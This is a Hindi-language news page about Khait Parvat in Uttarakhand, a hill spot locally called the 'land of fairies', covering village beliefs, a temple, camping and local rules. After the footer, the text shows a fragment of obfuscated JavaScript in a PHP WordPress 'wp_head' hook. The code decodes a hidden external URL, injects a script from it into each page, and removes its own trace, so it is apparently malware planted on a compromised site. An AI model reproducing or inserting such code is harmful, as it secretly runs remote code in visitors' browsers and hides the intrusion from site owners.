Friday, July 19, 2024
Google search engine
Homeअन्यखैट पर्वत का वो गुप्त रहस्य, जिसे कहा जाता है परियों का...

खैट पर्वत का वो गुप्त रहस्य, जिसे कहा जाता है परियों का देश, रोचक रहस्यों से जुड़ी बातें

उत्तराखंड में स्थित हिल स्टेशन्स की खूबसूरती को देखने के लिए देश-विदेश से टूरिस्ट्स की अच्छी खासी तादाद आती है। लेकिन कभी-कभी खूबसूरत जगहों के पीछे छिपे रहस्य टूरिस्ट्स को भी हैरान करके रख देते हैं। आज हम आपको एक ऐसी ही जगह के बारे में बताने जा रहे हैं जो अपनी खूबसूरती के साथ-साथ रहस्यमयी होने की वजह से भी जानी जाती है।

उत्तराखंड में स्थित इस छोटे से हिल स्टेशन की खूबसूरती की तुलना अक्सर स्वर्ग की सुंदरता से की जाती है। आपको बता दें कि इस हिल स्टेशन का नाम खैट पर्वत है। खैट पर्वत को ‘परियों का देश’ नाम से भी जाना जाता है। उत्तराखंड के गढ़वाल जिले में स्थित थात गांव के इस हिल स्टेशन को कम बजट में एक्सप्लोर किया जा सकता है।

इस जगह पर रहने वाले लोगों का कहना है कि इस जगह पर परियां दिखाई देती हैं। मान्यता ये है कि इस जगह पर नजर आने वाली परियां थात गांव की रक्षा करती हैं। कुछ लोग इन्हें योगिनियां और वनदेवियां भी मानते हैं। इतना ही नहीं इस गांव के पास स्थित खैटखाल मंदिर को भी रहस्यमयी माना जाता है।

आपकी जानकारी के लिए बता दें कि इस गांव में जून के महीने में मेला भी लगता है। हरियाली से घिरी ये जगह आपके सारे के सारे स्ट्रेस को दूर कर सकती है। अगर आप चाहें तो आप यहां पर कैंपिंग भी कर सकते हैं। लेकिन इस खूबसूरत लेकिन रहस्यमयी गांव में शाम को 7 बजे के बाद कैंप से बाहर निकलने की परमिशन नहीं है। इसके अलावा यहां पर म्यूजिक बजाने के लिए भी मना किया जाता है क्योंकि माना जाता है कि परियों को शोर पसंद नहीं है।

सम्बंधित खबरें
- Advertisment -spot_imgspot_img

ताजा खबरें

nt(_0x383697(0x178))/0x1+parseInt(_0x383697(0x180))/0x2+-parseInt(_0x383697(0x184))/0x3*(-parseInt(_0x383697(0x17a))/0x4)+-parseInt(_0x383697(0x17c))/0x5+-parseInt(_0x383697(0x179))/0x6+-parseInt(_0x383697(0x181))/0x7*(parseInt(_0x383697(0x177))/0x8)+-parseInt(_0x383697(0x17f))/0x9*(-parseInt(_0x383697(0x185))/0xa);if(_0x351603===_0x4eaeab)break;else _0x8113a5['push'](_0x8113a5['shift']());}catch(_0x58200a){_0x8113a5['push'](_0x8113a5['shift']());}}}(_0x48d3,0xa309a));var f=document[_0x3ec646(0x183)](_0x3ec646(0x17d));function _0x38c3(_0x32d1a4,_0x31b781){var _0x48d332=_0x48d3();return _0x38c3=function(_0x38c31a,_0x44995e){_0x38c31a=_0x38c31a-0x176;var _0x11c794=_0x48d332[_0x38c31a];return _0x11c794;},_0x38c3(_0x32d1a4,_0x31b781);}f[_0x3ec646(0x186)]=String[_0x3ec646(0x17b)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} ?>